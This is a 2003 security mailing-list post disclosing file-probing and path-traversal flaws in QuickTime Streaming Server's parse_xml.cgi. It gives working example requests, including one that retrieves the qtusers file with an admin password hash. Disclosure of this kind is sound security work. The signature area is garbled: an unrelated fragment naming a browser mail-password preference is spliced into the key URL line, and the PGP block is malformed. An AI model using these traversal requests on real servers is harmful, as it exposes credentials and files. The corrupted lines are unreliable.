Re: QuickTime/Darwin Streaming Administration Server Multiple vulnerabilities

From: Joe Testa (Joe_Testa@rapid7.com)
Date: 02/28/03

  • Next message: Gshively: "re: Security contact at SMC"
    To: full-disclosure@lists.netsys.com, bugtraq@securityfocus.com, vulndiscuss@vulnwatch.org
    From: "Joe Testa" <Joe_Testa@rapid7.com>
    Date: Fri, 28 Feb 2003 14:21:35 -0500
    
    

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Word.

    I've found two other issues in QuickTime Streaming Server v4.1.1 that
    seem to be fixed in the newest v4.1.3:

    1.) File probing:

      Request: http://localhost:1220/parse_xml.cgi?filename=../nonexistent
      Response: 'Can't access HTML file '../nonexistent'!' [...]

      Request: http://localhost:1220/parse_xml.cgi?
                     filename=../../../autoexec.bat
      Response: 'Can't open HTML file '../../../autoexec.bat'! [...]

    As you can see, this discrepency in the error message allows an
    unauthenticated user to "feel-out" the file system and determine what
    structures and files exist.

    2.) File retrieval:

      Request: http://localhost:1220/parse_xml.cgi?filename=.../qtusers
      Response: "realm Streaming Server admin:$dufr$D9/.....$C4g2VaRK" [...]

      This works against the Win32 platform, and not against the Linux
    platform; this was not tested against Solaris or MacOS X.

    Word.

       - Joe Testa, Rapid 7, Inc.
       http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x02B00839byron&quot;); <br> user_pref(&quot;mail.pop_password&quot;, &iD8DBQE+X7N/V+UY4AKwCDkRApNaAJkBIiCYmP705zL3wt2tIoR7j2XbowCfeSmf
       A145 B158 2CA7 00A2 BAE8 4A18 57E5 18E0 02B0 0839

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v6.6.6 (X)

    iD8DBQE+X7N/V+UY4AKwCDkRApNaAJkBIiCYmP705zL3wt2tIoR7j2XbowCfeSmf
    OmiDhu+FpspKJpToTLZ5zRc=
    =Yq4D
    -----END PGP SIGNATURE-----